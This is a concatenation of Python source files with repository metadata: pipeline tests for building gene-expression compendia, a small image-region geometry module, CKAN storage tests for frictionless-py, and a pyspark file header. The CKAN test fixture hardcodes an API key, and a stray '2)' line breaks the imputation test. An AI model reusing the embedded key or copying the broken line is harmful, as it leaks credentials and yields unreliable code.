(experiment, _) = Experiment.objects.get_or_create(accession_code="GSE1487313")
experiment.accession_code = "GSE1487313"
experiment.save()
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "GSM1487313",
"technology": "MICROARRAY",
"filename": "GSM1487313_liver.PCL",
"data_dir": DATA_DIR,
},
experiment,
)
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "MICROARRAY",
"filename": "GSM1487222_empty.PCL",
"data_dir": DATA_DIR,
},
experiment,
)
experiment2 = Experiment()
experiment2.accession_code = "SRP149598"
experiment2.save()
create_sample_for_experiment(
{
"organism": gallus_gallus,
"accession_code": "SRR7250867",
"technology": "RNA-SEQ",
"filename": "SRP149598_gene_lengthScaledTPM.tsv",
"data_dir": DATA_DIR,
},
experiment,
)
dset = Dataset()
dset.data = {
"GSE1487313": ["GSM1487313", "GSM1487222"],
"SRP149598": ["SRR7250867"],
}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertFailed(job, "k must be between 1 and min(A.shape)")
self.assertTrue("GSM1487222" in final_context["filtered_samples"])
self.assertEqual(
final_context["filtered_samples"]["GSM1487222"]["experiment_accession_code"],
"GSE1487313",
)
@tag("compendia")
def test_create_compendia_danio(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
experiment = Experiment()
experiment.accession_code = "GSE5678"
experiment.save()
result = ComputationalResult()
result.save()
rnas = []
for file in os.listdir("/home/user/data_store/raw/TEST/RNASEQ/"):
if "rnaseq.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "RNA-SEQ",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/RNASEQ/",
},
experiment,
)
rnas.append(file)
sample = create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "RNA-SEQ",
"filename": None,
},
experiment,
)
rnas.append(sample.accession_code)
dset = Dataset()
dset.data = {"GSE1234": micros, "GSE5678": rnas}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertSucceeded(job)
self.assertEqual(final_context["compendium_result"].result.computedfile_set.count(), 1)
for file in final_context["compendium_result"].result.computedfile_set.all():
self.assertTrue(os.path.exists(file.absolute_file_path))
self.assertEqual(final_context["compendium_result"].svd_algorithm, "ARPACK")
self.assertEqual(
final_context["compendium_result"].primary_organism.name,
final_context["organism_name"],
)
self.assertEqual(final_context["compendium_result"].primary_organism.name, "DANIO_RERIO")
self.assertEqual(final_context["compendium_result"].organisms.count(), 1)
self.assertEqual(len(final_context["filtered_samples"]), 10)
self.assertTrue("GSM1487222" in final_context["filtered_samples"])
self.assertEqual(
final_context["filtered_samples"]["GSM1487222"]["experiment_accession_code"], "GSE5678"
)
self.assertIn(
"This sample did not have a processed file",
final_context["filtered_samples"]["GSM1487222"]["reason"],
)
self.assertEqual(
len(
list(
filter(
lambda x: "less than 50% present values" in x["reason"],
final_context["filtered_samples"].values(),
)
)
),
9,
)
zf = zipfile.ZipFile(
final_context["compendium_result"].result.computedfile_set.first().absolute_file_path
)
with zf.open("aggregated_metadata.json") as f:
metadata = json.load(f)
self.assertFalse(metadata.get("quant_sf_only"))
self.assertEqual(metadata.get("compendium_version"), 1)
self.assertEqual(metadata.get("num_samples"), 830)
self.assertEqual(metadata.get("num_experiments"), 2)
self.assertTrue(metadata.get("quantile_normalized"))
self.assertIn("ks_statistic", final_context)
self.assertIn("ks_pvalue", final_context)
self.assertEqual(final_context["ks_pvalue"], 1.0)
@tag("compendia")
def test_create_compendia_microarray_only(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
dset = Dataset()
dset.data = {"GSE1234": micros}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
final_context = create_compendia.create_compendia(job.id)
self.assertSucceeded(job)
self.assertEqual(final_context["compendium_result"].result.computedfile_set.count(), 1)
for file in final_context["compendium_result"].result.computedfile_set.all():
self.assertTrue(os.path.exists(file.absolute_file_path))
self.assertEqual(final_context["compendium_result"].svd_algorithm, "ARPACK")
self.assertEqual(
final_context["compendium_result"].primary_organism.name,
final_context["organism_name"],
)
self.assertEqual(final_context["compendium_result"].primary_organism.name, "DANIO_RERIO")
self.assertEqual(final_context["compendium_result"].organisms.count(), 1)
zf = zipfile.ZipFile(
final_context["compendium_result"].result.computedfile_set.first().absolute_file_path
)
with zf.open("aggregated_metadata.json") as f:
metadata = json.load(f)
self.assertFalse(metadata.get("quant_sf_only"))
self.assertEqual(metadata.get("num_samples"), 420)
self.assertEqual(metadata.get("num_experiments"), 1)
self.assertTrue(metadata.get("quantile_normalized"))
self.assertIn("ks_statistic", final_context)
self.assertIn("ks_pvalue", final_context)
self.assertEqual(final_context["ks_pvalue"], 1.0)
@tag("compendia")
def test_filter_rnaseq_matrix_drop_row_sums(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
samples = list(str(i) for i in range(0, 10))
df = pd.DataFrame(columns=samples)
for i in range(1, 101):
df.loc[str(i)] = {idx: i for idx in samples}
job_context = {"rnaseq_matrix": df, "job": job}
final_job_context = create_compendia._filter_rnaseq_matrix(job_context)
filtered_matrix = final_job_context["filtered_rnaseq_matrix"]
self.assertNotIn("rnaseq_matrix", final_job_context.keys())
self.assertEqual(set(filtered_matrix.index), set(str(i) for i in range(11, 101)))
@tag("compendia")
def test_drop_samples(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1)
danio_rerio.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
samples = list(str(i) for i in range(0, 10))
for i in samples:
create_sample_for_experiment(
{"organism": danio_rerio, "accession_code": i, "technology": "MICROARRAY"},
experiment,
)
dset = Dataset()
dset.data = {"GSE1234": "ALL"}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
df = pd.DataFrame(columns=samples)
for i in range(1, 101):
row_i = {idx: i for idx in samples}
if i % 3 != 0 and i % 3 != 1:
del row_i["0"]
if i % 2 != 0:
del row_i["1"]
if i % 3 != 0:
del row_i["2"]
if i % 4 != 0:
del row_i["3"]
df.loc[str(i)] = row_i
job_context = {
"microarray_matrix": df,
"job": job,
"dataset": dset,
"filtered_samples": {},
}
job_context = create_compendia._full_outer_join_gene_matrices(job_context)
final_job_context = create_compendia._filter_rows_and_columns(job_context)
filtered_matrix = final_job_context["row_col_filtered_matrix"]
self.assertEqual(set(filtered_matrix.columns), {"0", "1"} | {str(i) for i in range(4, 10)})
self.assertEqual(set(final_job_context["filtered_samples"].keys()), {"2", "3"})
for v in final_job_context["filtered_samples"].values():
self.assertIn("less than 50% present", v["reason"])
@tag("compendia")
def test_imputation(self):
job = ProcessorJob()
job.pipeline_applied = ProcessorPipeline.CREATE_COMPENDIA.value
job.save()
experiment = Experiment()
experiment.accession_code = "GSE1234"
experiment.save()
result = ComputationalResult()
result.save()
qn_target = ComputedFile()
qn_target.filename = "danio_target.tsv"
qn_target.absolute_file_path = "/home/user/data_store/QN/danio_target.tsv"
qn_target.is_qn_target = True
qn_target.size_in_bytes = "12345"
qn_target.sha1 = "aabbccddeeff"
qn_target.result = result
qn_target.save()
danio_rerio = Organism(name="DANIO_RERIO", taxonomy_id=1, qn_target=result)
danio_rerio.save()
cra = ComputationalResultAnnotation()
cra.data = {}
cra.data["organism_id"] = danio_rerio.id
cra.data["is_qn"] = True
cra.result = result
cra.save()
result = ComputationalResult()
result.save()
micros = []
for file in os.listdir("/home/user/data_store/raw/TEST/MICROARRAY/"):
if "microarray.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "MICROARRAY",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/MICROARRAY/",
},
experiment,
)
micros.append(file)
experiment = Experiment()
experiment.accession_code = "GSE5678"
experiment.save()
result = ComputationalResult()
result.save()
rnas = []
for file in os.listdir("/home/user/data_store/raw/TEST/RNASEQ/"):
if "rnaseq.txt" in file:
continue
create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": file,
"technology": "RNA-SEQ",
"filename": file,
"data_dir": "/home/user/data_store/raw/TEST/RNASEQ/",
},
experiment,
)
rnas.append(file)
sample = create_sample_for_experiment(
{
"organism": danio_rerio,
"accession_code": "GSM1487222",
"title": "this sample will be filtered",
"technology": "RNA-SEQ",
"filename": None,
},
experiment,
)
rnas.append(sample.accession_code)
dset = Dataset()
dset.data = {"GSE1234": micros, "GSE5678": rnas}
dset.scale_by = "NONE"
dset.aggregate_by = "SPECIES"
dset.svd_algorithm = "ARPACK"
dset.quantile_normalize = True
dset.save()
pjda = ProcessorJobDatasetAssociation()
pjda.processor_job = job
pjda.dataset = dset
pjda.save()
imputation_index = create_compendia.COMPENDIA_PIPELINE.index(
create_compendia._perform_imputation
)
pipeline = Pipeline(name=PipelineEnum.CREATE_COMPENDIA.value)
job_context = utils.run_pipeline(
{"job_id": job.id, "pipeline": pipeline},
create_compendia.COMPENDIA_PIPELINE[:imputation_index],
)
expected_context = utils.run_pipeline(
job_context.copy(), [create_compendia.COMPENDIA_PIPELINE[imputation_index]]
)
2)
rare_rows = random.sample(list(job_context["microarray_matrix"].index), k=25)
rare_genes = {}
for row in rare_rows:
cols = random.sample(
list(job_context["microarray_matrix"].columns),
k=int(0.28 * 840),
)
rare_genes[row] = cols
for col in cols:
job_context["microarray_matrix"].loc[row, col] = np.nan
individual_indices = random.sample(
list(
itertools.product(
set(job_context["microarray_matrix"].index) - set(rare_rows),
job_context["microarray_matrix"].columns,
)
),
k=1000,
)
for row, col in individual_indices:
job_context["microarray_matrix"].loc[row, col] = np.nan
final_context = utils.run_pipeline(
job_context, [create_compendia.COMPENDIA_PIPELINE[imputation_index]]
)
self.assertDidNotFail(job)
index = set(final_context["merged_no_qn"].index) & set(
expected_context["merged_no_qn"].index
)
columns = set(final_context["merged_no_qn"].columns) & set(
expected_context["merged_no_qn"].columns
)
N = 0
squared_error = 0
affected_entries = {
*individual_indices,
*((row, col) for row, cols in rare_genes.items() for col in cols),
}
for row, col in affected_entries:
if row in index and col in columns:
actual = final_context["merged_no_qn"].loc[row, col]
expected = expected_context["merged_no_qn"].loc[row, col]
N += 1
squared_error += (actual - expected) ** 2
rmse = math.sqrt(squared_error / N)
self.assertLess(abs(rmse - 0.2868600293662542), 0.05)
| true
| true
|
1c4234506b59f49708e87e082d6cfd6b4e7c42d0
| 3,253
|
py
|
Python
|
src/model/region2d.py
|
RobertMcCarter/animal-finder
|
5ac839a65df62ab312e440ce43416727492e84d8
|
[
"MIT"
] | null | null | null |
src/model/region2d.py
|
RobertMcCarter/animal-finder
|
5ac839a65df62ab312e440ce43416727492e84d8
|
[
"MIT"
] | null | null | null |
src/model/region2d.py
|
RobertMcCarter/animal-finder
|
5ac839a65df62ab312e440ce43416727492e84d8
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
from typing import Union
@dataclass(frozen=True)
class Region2d:
"""The basic Region (rectangle) in an image
Top left is (0,0) and x increases to the right while
y increases down the image.
"""
x: int
y: int
w: int
h: int
@property
def x1(self) -> int:
return self.x
@property
def y1(self) -> int:
return self.y
@property
def x2(self) -> int:
return self.x + self.w
@property
def y2(self) -> int:
return self.y + self.h
@property
def right_x(self) -> int:
"""The computed right x value - basically (x + w)"""
return self.x2
@property
def bottom_y(self) -> int:
"""The computed bottom y value - basically (y + h)"""
return self.y2
# Return a new region 2d object with _all_ values scaled
# This is very useful when scaling up/down an image for display
def scale(region: Region2d, scaleFactor: float):
"""Scale this 2d region by the given scale (in both x and y directions)
returning a new region 2d with the new scaled values
"""
new_x: int = int(region.x * scaleFactor)
new_y: int = int(region.y * scaleFactor)
new_w: int = int(region.w * scaleFactor)
new_h: int = int(region.h * scaleFactor)
return Region2d(new_x, new_y, new_w, new_h)
def normalize(region: Region2d) -> Region2d:
"""The user may draw a rectangle "backwards" (from right to left)
so that the width and height are negative.
This function does the math to flip around the region 2d
x,y,w,h values so that the width and height are positive.
Returns:
[Region2d]: Returns a "normalized" region 2d with a positive width and height
"""
# If both width and height are positive, we're already normalized
# and we can just return ourself
if region.w > 0 and region.h > 0:
return region
# Either (or both) of width or height are negative, we need to create a new
# Region2d
x, y, w, h = region.x, region.y, region.w, region.h
if w < 0:
x, w = x + w, -w
if h < 0:
y, h = y + h, -h
return Region2d(x, y, w, h)
def intersects(a: Region2d, b: Region2d) -> bool:
"""Determines if the two image regions intersect at all
Args:
a (Region): The first region to test with
b (Region): The second region to test with
Returns:
bool: `True` if the two regions intersect at all, `False` if they do not
"""
return not ((a.x2 < b.x1 or a.x1 > b.x2) or (a.y1 > b.y2 or a.y2 < b.y1))
def intersectsAny(a: Region2d, testRegions: list[Region2d]) -> bool:
"""Determines if the `a` region intersects any region in the list of `testRegions`.
Args:
a (Region): The first region to test with
testRegions (list[Region]): The second region to test with
Returns:
bool: `True` if the a region intersect any of the regions in `testRegions`,
`False` if they do not
"""
return any(intersects(a, b) for b in testRegions)
@dataclass(frozen=True)
class TaggedRegion2d(Region2d):
"""Represents a tagged region - either `True` or `False` there is an animal in the region"""
tag: bool
| 28.787611
| 96
| 0.627421
|
from dataclasses import dataclass
from typing import Union
@dataclass(frozen=True)
class Region2d:
x: int
y: int
w: int
h: int
@property
def x1(self) -> int:
return self.x
@property
def y1(self) -> int:
return self.y
@property
def x2(self) -> int:
return self.x + self.w
@property
def y2(self) -> int:
return self.y + self.h
@property
def right_x(self) -> int:
return self.x2
@property
def bottom_y(self) -> int:
return self.y2
def scale(region: Region2d, scaleFactor: float):
new_x: int = int(region.x * scaleFactor)
new_y: int = int(region.y * scaleFactor)
new_w: int = int(region.w * scaleFactor)
new_h: int = int(region.h * scaleFactor)
return Region2d(new_x, new_y, new_w, new_h)
def normalize(region: Region2d) -> Region2d:
# and we can just return ourself
if region.w > 0 and region.h > 0:
return region
# Either (or both) of width or height are negative, we need to create a new
# Region2d
x, y, w, h = region.x, region.y, region.w, region.h
if w < 0:
x, w = x + w, -w
if h < 0:
y, h = y + h, -h
return Region2d(x, y, w, h)
def intersects(a: Region2d, b: Region2d) -> bool:
return not ((a.x2 < b.x1 or a.x1 > b.x2) or (a.y1 > b.y2 or a.y2 < b.y1))
def intersectsAny(a: Region2d, testRegions: list[Region2d]) -> bool:
return any(intersects(a, b) for b in testRegions)
@dataclass(frozen=True)
class TaggedRegion2d(Region2d):
tag: bool
| true
| true
|
1c4234615ff82fe07f07ba85b5f296cecc94fb84
| 7,813
|
py
|
Python
|
tests/plugins/test_ckan.py
|
augusto-herrmann/frictionless-py
|
b4ff35f064141a2c04882edb592666ca6b066776
|
[
"MIT"
] | 1
|
2021-11-08T22:29:30.000Z
|
2021-11-08T22:29:30.000Z
|
tests/plugins/test_ckan.py
|
augusto-herrmann/frictionless-py
|
b4ff35f064141a2c04882edb592666ca6b066776
|
[
"MIT"
] | null | null | null |
tests/plugins/test_ckan.py
|
augusto-herrmann/frictionless-py
|
b4ff35f064141a2c04882edb592666ca6b066776
|
[
"MIT"
] | null | null | null |
import pytest
import datetime
from frictionless import Package, Resource, FrictionlessException
from frictionless.plugins.ckan import CkanStorage, CkanDialect
# Parser
@pytest.mark.vcr
def test_ckan_parser(options):
url = options.pop("url")
dialect = CkanDialect(resource="table", **options)
source = Resource("data/timezone.csv")
target = source.write(url, format="ckan", dialect=dialect)
with target:
assert target.header == ["id", "name"]
assert target.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
@pytest.mark.vcr
def test_ckan_parser_timezone(options):
url = options.pop("url")
dialect = CkanDialect(resource="timezone", **options)
source = Resource("data/timezone.csv")
target = source.write(url, format="ckan", dialect=dialect)
with target:
assert target.read_rows() == [
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
]
# Storage
@pytest.mark.vcr
def test_ckan_storage_types(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/types.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
# Assert metadata
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"}, # type fallback
{"name": "array", "type": "array"},
{"name": "boolean", "type": "boolean"},
{"name": "date", "type": "string"}, # type fallback
{"name": "date_year", "type": "string"}, # type fallback
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"}, # type fallback
{"name": "geojson", "type": "object"}, # type downgrade
{"name": "geopoint", "type": "string"}, # type fallback
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "object"},
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"}, # type downgrade
{"name": "yearmonth", "type": "string"}, # type fallback
],
}
# Assert data
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": ["Mike", "John"],
"boolean": True,
"date": "2015-01-01",
"date_year": "2015",
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": {"type": "Point", "coordinates": [33, 33.33]},
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": {"chars": 560},
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_integrity(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/integrity.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
# Assert metadata (main)
assert target.get_resource("integrity_main").schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
# primary key removal
# foreign keys removal
}
# Assert metadata (link)
assert target.get_resource("integrity_link").schema == {
"fields": [
{"name": "main_id", "type": "integer"},
{"name": "some_id", "type": "integer"}, # constraint removal
{"name": "description", "type": "string"}, # constraint removal
],
# primary key removal
# foreign keys removal
}
# Assert data (main)
assert target.get_resource("integrity_main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
# Assert data (link)
assert target.get_resource("integrity_link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_constraints(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/constraints.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
# Assert metadata
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string"}, # constraint removal
{"name": "minLength", "type": "string"}, # constraint removal
{"name": "maxLength", "type": "string"}, # constraint removal
{"name": "pattern", "type": "string"}, # constraint removal
{"name": "enum", "type": "string"}, # constraint removal
{"name": "minimum", "type": "integer"}, # constraint removal
{"name": "maximum", "type": "integer"}, # constraint removal
],
}
# Assert data
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
# Cleanup storage
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_not_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
with pytest.raises(FrictionlessException) as excinfo:
storage.read_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
@pytest.mark.vcr
def test_ckan_storage_write_resource_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
resource = Resource(path="data/table.csv")
storage.write_resource(resource, force=True)
with pytest.raises(FrictionlessException) as excinfo:
storage.write_resource(resource)
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("already exists")
# Cleanup storage
storage.delete_package(list(storage))
@pytest.mark.vcr
def test_ckan_storage_delete_resource_not_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
with pytest.raises(FrictionlessException) as excinfo:
storage.delete_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
# Fixtures
@pytest.fixture
def options():
return {
"url": "https://demo.ckan.org/",
"dataset": "frictionless",
"apikey": "51912f57-a657-4caa-b2a7-0a1c16821f4b",
}
| 33.676724
| 87
| 0.581211
|
import pytest
import datetime
from frictionless import Package, Resource, FrictionlessException
from frictionless.plugins.ckan import CkanStorage, CkanDialect
@pytest.mark.vcr
def test_ckan_parser(options):
url = options.pop("url")
dialect = CkanDialect(resource="table", **options)
source = Resource("data/timezone.csv")
target = source.write(url, format="ckan", dialect=dialect)
with target:
assert target.header == ["id", "name"]
assert target.read_rows() == [
{"id": 1, "name": "english"},
{"id": 2, "name": "中国人"},
]
@pytest.mark.vcr
def test_ckan_parser_timezone(options):
url = options.pop("url")
dialect = CkanDialect(resource="timezone", **options)
source = Resource("data/timezone.csv")
target = source.write(url, format="ckan", dialect=dialect)
with target:
assert target.read_rows() == [
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
{"datetime": datetime.datetime(2020, 1, 1, 15), "time": datetime.time(15)},
]
@pytest.mark.vcr
def test_ckan_storage_types(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/types.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
assert target.get_resource("types").schema == {
"fields": [
{"name": "any", "type": "string"},
{"name": "array", "type": "array"},
{"name": "boolean", "type": "boolean"},
{"name": "date", "type": "string"},
{"name": "date_year", "type": "string"},
{"name": "datetime", "type": "datetime"},
{"name": "duration", "type": "string"},
{"name": "geojson", "type": "object"},
{"name": "geopoint", "type": "string"},
{"name": "integer", "type": "integer"},
{"name": "number", "type": "number"},
{"name": "object", "type": "object"},
{"name": "string", "type": "string"},
{"name": "time", "type": "time"},
{"name": "year", "type": "integer"},
{"name": "yearmonth", "type": "string"},
],
}
assert target.get_resource("types").read_rows() == [
{
"any": "中国人",
"array": ["Mike", "John"],
"boolean": True,
"date": "2015-01-01",
"date_year": "2015",
"datetime": datetime.datetime(2015, 1, 1, 3, 0),
"duration": "P1Y1M",
"geojson": {"type": "Point", "coordinates": [33, 33.33]},
"geopoint": "30,70",
"integer": 1,
"number": 7,
"object": {"chars": 560},
"string": "english",
"time": datetime.time(3, 0),
"year": 2015,
"yearmonth": "2015-01",
},
]
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_integrity(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/integrity.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
assert target.get_resource("integrity_main").schema == {
"fields": [
{"name": "id", "type": "integer"},
{"name": "parent", "type": "integer"},
{"name": "description", "type": "string"},
],
}
assert target.get_resource("integrity_link").schema == {
"fields": [
{"name": "main_id", "type": "integer"},
{"name": "some_id", "type": "integer"},
{"name": "description", "type": "string"},
],
}
assert target.get_resource("integrity_main").read_rows() == [
{"id": 1, "parent": None, "description": "english"},
{"id": 2, "parent": 1, "description": "中国人"},
]
assert target.get_resource("integrity_link").read_rows() == [
{"main_id": 1, "some_id": 1, "description": "note1"},
{"main_id": 2, "some_id": 2, "description": "note2"},
]
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_constraints(options):
url = options.pop("url")
dialect = CkanDialect(**options)
source = Package("data/storage/constraints.json")
storage = source.to_ckan(url, dialect=dialect)
target = Package.from_ckan(url, dialect=dialect)
assert target.get_resource("constraints").schema == {
"fields": [
{"name": "required", "type": "string"},
{"name": "minLength", "type": "string"},
{"name": "maxLength", "type": "string"},
{"name": "pattern", "type": "string"},
{"name": "enum", "type": "string"},
{"name": "minimum", "type": "integer"},
{"name": "maximum", "type": "integer"},
],
}
assert target.get_resource("constraints").read_rows() == [
{
"required": "passing",
"minLength": "passing",
"maxLength": "passing",
"pattern": "passing",
"enum": "passing",
"minimum": 5,
"maximum": 5,
},
]
storage.delete_package(target.resource_names)
@pytest.mark.vcr
def test_ckan_storage_not_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
with pytest.raises(FrictionlessException) as excinfo:
storage.read_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
@pytest.mark.vcr
def test_ckan_storage_write_resource_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
resource = Resource(path="data/table.csv")
storage.write_resource(resource, force=True)
with pytest.raises(FrictionlessException) as excinfo:
storage.write_resource(resource)
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("already exists")
storage.delete_package(list(storage))
@pytest.mark.vcr
def test_ckan_storage_delete_resource_not_existent_error(options):
url = options.pop("url")
dialect = CkanDialect(**options)
storage = CkanStorage(url, dialect=dialect)
with pytest.raises(FrictionlessException) as excinfo:
storage.delete_resource("bad")
error = excinfo.value.error
assert error.code == "storage-error"
assert error.note.count("does not exist")
@pytest.fixture
def options():
return {
"url": "https://demo.ckan.org/",
"dataset": "frictionless",
"apikey": "51912f57-a657-4caa-b2a7-0a1c16821f4b",
}
| true
| true
|
1c423486be8d98de941898b2331c90c0380eded0
| 63,214
|
py
|
Python
|
python/pyspark/ml/feature.py
|
bbejeck/spark
|
56a0fe5c6e4ae2929c48fae2d6225558d020e5f9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
python/pyspark/ml/feature.py
|
bbejeck/spark
|
56a0fe5c6e4ae2929c48fae2d6225558d020e5f9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
python/pyspark/ml/feature.py
|
bbejeck/spark
|
56a0fe5c6e4ae2929c48fae2d6225558d020e5f9
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import sys
if sys.version > '3':
basestring = str
